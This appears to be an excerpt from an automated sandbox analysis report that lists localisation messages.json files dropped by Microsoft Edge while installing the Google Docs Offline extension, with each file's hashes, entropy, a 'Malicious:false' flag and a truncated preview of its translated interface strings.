                                SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                MD5:BC7E1D09028B085B74CB4E04D8A90814
                                SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\hi\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1672
                                Entropy (8bit):4.314484457325167
                                Encrypted:false
                                SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\hr\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):935
                                Entropy (8bit):4.6369398601609735
                                Encrypted:false
                                SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\hu\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1065
                                Entropy (8bit):4.816501737523951
                                Encrypted:false
                                SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\hy\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2771
                                Entropy (8bit):3.7629875118570055
                                Encrypted:false
                                SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                MD5:55DE859AD778E0AA9D950EF505B29DA9
                                SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                Malicious:false
                                Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\id\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):858
                                Entropy (8bit):4.474411340525479
                                Encrypted:false
                                SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\is\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):954
                                Entropy (8bit):4.631887382471946
                                Encrypted:false
                                SSDEEP:12:YGXU2rOcxGe+J97f9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95MwP9KkJ+je:YwBrD2J2DBLMfFuWvdpY94vioO+uh
                                MD5:1F565FB1C549B18AF8BBFED8DECD5D94
                                SHA1:B57F4BDAE06FF3DFC1EB3E56B6F2F204D6F63638
                                SHA-256:E16325D1A641EF7421F2BAFCD6433D53543C89D498DD96419B03CBA60B9C7D60
                                SHA-512:A60B8E042A9BCDCC136B87948E9924A0B24D67C6CA9803904B876F162A0AD82B9619F1316BE9FF107DD143B44F7E6F5DF604ABFE00818DEB40A7D62917CDA69F
                                Malicious:false
                                Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\it\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):899
                                Entropy (8bit):4.474743599345443
                                Encrypted:false
                                SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                MD5:0D82B734EF045D5FE7AA680B6A12E711
                                SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\iw\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2230
                                Entropy (8bit):3.8239097369647634
                                Encrypted:false
                                SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                Malicious:false
                                Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\ja\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1160
                                Entropy (8bit):5.292894989863142
                                Encrypted:false
                                SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\ka\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):3264
                                Entropy (8bit):3.586016059431306
                                Encrypted:false
                                SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                MD5:83F81D30913DC4344573D7A58BD20D85
                                SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                Malicious:false
                                Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\kk\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):3235
                                Entropy (8bit):3.6081439490236464
                                Encrypted:false
                                SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                Malicious:false
                                Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\km\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):3122
                                Entropy (8bit):3.891443295908904
                                Encrypted:false
                                SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                Malicious:false
                                Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\kn\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1880
                                Entropy (8bit):4.295185867329351
                                Encrypted:false
                                SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/UGG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZZ
                                MD5:8E16966E815C3C274EEB8492B1EA6648
                                SHA1:7482ED9F1C9FD9F6F9BA91AB15921B19F64C9687
                                SHA-256:418FF53FCA505D54268413C796E4DF80E947A09F399AB222A90B81E93113D5B5
                                SHA-512:85B28202E874B1CF45B37BA05B87B3D8D6FE38E89C6011C4240CF6B563EA6DA60181D712CCE20D07C364F4A266A4EC90C4934CC8B7BB2013CB3B22D755796E38
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\ko\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1042
                                Entropy (8bit):5.3945675025513955
                                Encrypted:false
                                SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                MD5:F3E59EEEB007144EA26306C20E04C292
                                SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\lo\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2535
                                Entropy (8bit):3.8479764584971368
                                Encrypted:false
                                SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                MD5:E20D6C27840B406555E2F5091B118FC5
                                SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                Malicious:false
                                Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs 